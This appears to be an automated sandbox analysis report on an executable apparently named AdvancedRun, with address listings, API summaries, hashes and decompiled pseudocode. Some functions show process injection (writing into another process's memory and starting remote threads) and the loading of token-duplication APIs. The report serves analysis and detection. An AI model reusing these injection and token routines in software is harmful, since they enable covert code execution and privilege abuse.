                                                                                                                                                                  0x0040a518
                                                                                                                                                                  0x0040a51c
                                                                                                                                                                  0x0040a523
                                                                                                                                                                  0x0040a523
                                                                                                                                                                  0x0040a523
                                                                                                                                                                  0x0040a528
                                                                                                                                                                  0x0040a537
                                                                                                                                                                  0x0040a54c
                                                                                                                                                                  0x0040a539
                                                                                                                                                                  0x0040a544
                                                                                                                                                                  0x0040a549
                                                                                                                                                                  0x0040a558
                                                                                                                                                                  0x0040a56d
                                                                                                                                                                  0x0040a55a
                                                                                                                                                                  0x0040a565
                                                                                                                                                                  0x0040a56a
                                                                                                                                                                  0x0040a579
                                                                                                                                                                  0x0040a591
                                                                                                                                                                  0x0040a57b
                                                                                                                                                                  0x0040a589
                                                                                                                                                                  0x0040a58e
                                                                                                                                                                  0x0040a5b4
                                                                                                                                                                  0x0040a5b7
                                                                                                                                                                  0x0040a5cc
                                                                                                                                                                  0x0040a5cf
                                                                                                                                                                  0x0040a5d4
                                                                                                                                                                  0x0040a5d7
                                                                                                                                                                  0x0040a6ed
                                                                                                                                                                  0x0040a5e5
                                                                                                                                                                  0x0040a5fa
                                                                                                                                                                  0x0040a60b
                                                                                                                                                                  0x0040a61a
                                                                                                                                                                  0x0040a620
                                                                                                                                                                  0x0040a623
                                                                                                                                                                  0x0040a62b
                                                                                                                                                                  0x0040a62f
                                                                                                                                                                  0x0040a632
                                                                                                                                                                  0x0040a659
                                                                                                                                                                  0x0040a634
                                                                                                                                                                  0x0040a635
                                                                                                                                                                  0x0040a641
                                                                                                                                                                  0x0040a648
                                                                                                                                                                  0x0040a648
                                                                                                                                                                  0x0040a668
                                                                                                                                                                  0x0040a66e
                                                                                                                                                                  0x0040a685
                                                                                                                                                                  0x0040a69e
                                                                                                                                                                  0x0040a6a8
                                                                                                                                                                  0x0040a6ad
                                                                                                                                                                  0x0040a6bd
                                                                                                                                                                  0x0040a6c5
                                                                                                                                                                  0x0040a6c8
                                                                                                                                                                  0x0040a6d0
                                                                                                                                                                  0x0040a6d1
                                                                                                                                                                  0x0040a6d2
                                                                                                                                                                  0x0040a6d3
                                                                                                                                                                  0x0040a6d3
                                                                                                                                                                  0x0040a6c8
                                                                                                                                                                  0x0040a6d7
                                                                                                                                                                  0x0040a6dc
                                                                                                                                                                  0x0040a6dc
                                                                                                                                                                  0x0040a6d7
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CA2
                                                                                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CC0
                                                                                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW,?), ref: 0040A4EA
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError,?), ref: 0040A50B
                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                                                                  • memset.MSVCRT ref: 0040A66E
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                                                                  • API String ID: 1572607441-20550370
                                                                                                                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                                                                  0x004028a3
                                                                                                                                                                  0x004028ab
                                                                                                                                                                  0x004028bd
                                                                                                                                                                  0x004028ca
                                                                                                                                                                  0x004028d7
                                                                                                                                                                  0x004028e3
                                                                                                                                                                  0x004028e6
                                                                                                                                                                  0x004028e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004028eb
                                                                                                                                                                  0x004028ec

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                                                                  • API String ID: 2238633743-1970996977
                                                                                                                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                                                                  0x0040a27d
                                                                                                                                                                  0x0040a286
                                                                                                                                                                  0x0040a290
                                                                                                                                                                  0x0040a29d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a32f
                                                                                                                                                                  0x0040a29f
                                                                                                                                                                  0x0040a2a4
                                                                                                                                                                  0x0040a2ad
                                                                                                                                                                  0x0040a2b6
                                                                                                                                                                  0x0040a2bc
                                                                                                                                                                  0x0040a2be
                                                                                                                                                                  0x0040a2c4
                                                                                                                                                                  0x0040a2c8
                                                                                                                                                                  0x0040a2ce
                                                                                                                                                                  0x0040a2e3
                                                                                                                                                                  0x0040a2ed
                                                                                                                                                                  0x0040a2fb
                                                                                                                                                                  0x0040a2fe
                                                                                                                                                                  0x0040a305
                                                                                                                                                                  0x0040a30c
                                                                                                                                                                  0x0040a30f
                                                                                                                                                                  0x0040a313
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a31a
                                                                                                                                                                  0x0040a338

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                                                                                  • CreateRemoteThread.KERNEL32 ref: 0040A32F
                                                                                                                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?,00008288), ref: 0040A263
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                                                                  • String ID: $
                                                                                                                                                                  • API String ID: 283512611-3993045852
                                                                                                                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                                                                  0x00401093
                                                                                                                                                                  0x00401096
                                                                                                                                                                  0x00401097
                                                                                                                                                                  0x0040109b
                                                                                                                                                                  0x004010a3
                                                                                                                                                                  0x004010a5
                                                                                                                                                                  0x00401270
                                                                                                                                                                  0x00401278
                                                                                                                                                                  0x004012b3
                                                                                                                                                                  0x0040127a
                                                                                                                                                                  0x00401293
                                                                                                                                                                  0x004012a2
                                                                                                                                                                  0x004012a2
                                                                                                                                                                  0x004012c1
                                                                                                                                                                  0x004012d9
                                                                                                                                                                  0x004012ea
                                                                                                                                                                  0x004012ec
                                                                                                                                                                  0x004012f6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004010ab
                                                                                                                                                                  0x004010ab
                                                                                                                                                                  0x004010ac
                                                                                                                                                                  0x00401231
                                                                                                                                                                  0x00401236
                                                                                                                                                                  0x00401239
                                                                                                                                                                  0x0040123d
                                                                                                                                                                  0x00401249
                                                                                                                                                                  0x00401249
                                                                                                                                                                  0x0040124c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401252
                                                                                                                                                                  0x00401259
                                                                                                                                                                  0x00401265
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401265
                                                                                                                                                                  0x0040123f
                                                                                                                                                                  0x0040123f
                                                                                                                                                                  0x00401243
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401243
                                                                                                                                                                  0x004010b2
                                                                                                                                                                  0x004010b2
                                                                                                                                                                  0x004010b5
                                                                                                                                                                  0x004011e1
                                                                                                                                                                  0x004011e3
                                                                                                                                                                  0x004011e6
                                                                                                                                                                  0x0040120e
                                                                                                                                                                  0x00401216
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040121c
                                                                                                                                                                  0x00401224
                                                                                                                                                                  0x00401226
                                                                                                                                                                  0x00401229
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040122f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040122f
                                                                                                                                                                  0x00401229
                                                                                                                                                                  0x004011e8
                                                                                                                                                                  0x004011e8
                                                                                                                                                                  0x004011ed
                                                                                                                                                                  0x004011fb
                                                                                                                                                                  0x00401203
                                                                                                                                                                  0x00401203
                                                                                                                                                                  0x004010bb
                                                                                                                                                                  0x004010bb
                                                                                                                                                                  0x004010c0
                                                                                                                                                                  0x00401151
                                                                                                                                                                  0x0040115a
                                                                                                                                                                  0x00401168
                                                                                                                                                                  0x0040116b
                                                                                                                                                                  0x0040116e
                                                                                                                                                                  0x00401170
                                                                                                                                                                  0x00401173
                                                                                                                                                                  0x00401180
                                                                                                                                                                  0x00401182
                                                                                                                                                                  0x00401185
                                                                                                                                                                  0x004011a4
                                                                                                                                                                  0x004011ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004011b2
                                                                                                                                                                  0x004011ba
                                                                                                                                                                  0x004011bc
                                                                                                                                                                  0x004011c7
                                                                                                                                                                  0x004011c9
                                                                                                                                                                  0x004011cb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004011d1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004011d1
                                                                                                                                                                  0x004011cb
                                                                                                                                                                  0x00401187
                                                                                                                                                                  0x00401187
                                                                                                                                                                  0x00401199
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401199
                                                                                                                                                                  0x004010c6
                                                                                                                                                                  0x004010c8
                                                                                                                                                                  0x004012fd
                                                                                                                                                                  0x004012fd
                                                                                                                                                                  0x004012fd
                                                                                                                                                                  0x004010ce
                                                                                                                                                                  0x004010ce
                                                                                                                                                                  0x004010d7
                                                                                                                                                                  0x004010e5
                                                                                                                                                                  0x004010e8
                                                                                                                                                                  0x004010eb
                                                                                                                                                                  0x004010ed
                                                                                                                                                                  0x004010f0
                                                                                                                                                                  0x00401102
                                                                                                                                                                  0x0040111d
                                                                                                                                                                  0x00401125
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040112b
                                                                                                                                                                  0x00401133
                                                                                                                                                                  0x00401135
                                                                                                                                                                  0x00401140
                                                                                                                                                                  0x00401142
                                                                                                                                                                  0x00401144
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040114a
                                                                                                                                                                  0x0040114a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040114a
                                                                                                                                                                  0x00401144
                                                                                                                                                                  0x00401104
                                                                                                                                                                  0x0040110a
                                                                                                                                                                  0x0040110b
                                                                                                                                                                  0x0040110b
                                                                                                                                                                  0x0040110e
                                                                                                                                                                  0x00401115
                                                                                                                                                                  0x00401117
                                                                                                                                                                  0x00401117
                                                                                                                                                                  0x00401102
                                                                                                                                                                  0x004010c8
                                                                                                                                                                  0x004010c0
                                                                                                                                                                  0x004010b5
                                                                                                                                                                  0x004010ac
                                                                                                                                                                  0x00401303

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                  • String ID: AdvancedRun
                                                                                                                                                                  • API String ID: 829165378-481304740
                                                                                                                                                                  • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                  • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                                                                  • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                  • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































